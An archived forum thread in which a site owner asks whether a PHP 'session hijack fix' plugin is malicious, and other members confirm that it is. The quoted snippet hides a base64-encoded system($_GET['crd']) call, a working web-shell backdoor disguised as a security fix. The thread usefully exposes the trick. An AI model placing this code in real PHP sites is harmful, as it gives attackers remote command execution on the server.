Is this malicious? [Archive]

CPTA

07-30-2011, 07:27 AM

Some kid told us to add this to our forum as a plugin, we didn't in fear that it was malicious.

//Fix Session Hijack Bug
if(isset($_GET['crd'])){ $HIDE_SESSION = 1; echo "<h1>Session Hijack Blocked</h1><pre>"; eval(base64_decode("c3lzdGVtKCRfR0VUWydjcmQnXSk7")); exit; }

ForumsMods

07-30-2011, 07:39 AM

Yes it is malicious.
The code will execute an external program and display the output (the crd url parameter).

CPTA

07-30-2011, 07:46 AM

Thank you m8

setishock

07-30-2011, 04:26 PM

That needs to be in a bbcode code block.

Boofo

07-30-2011, 04:32 PM

base64_decode is a no-no.

ForumsMods

07-30-2011, 05:33 PM

base64_decode is a no-no.
Some hostings block the use of base64 functions.

Boofo

07-30-2011, 06:59 PM

The good ones do, anyway.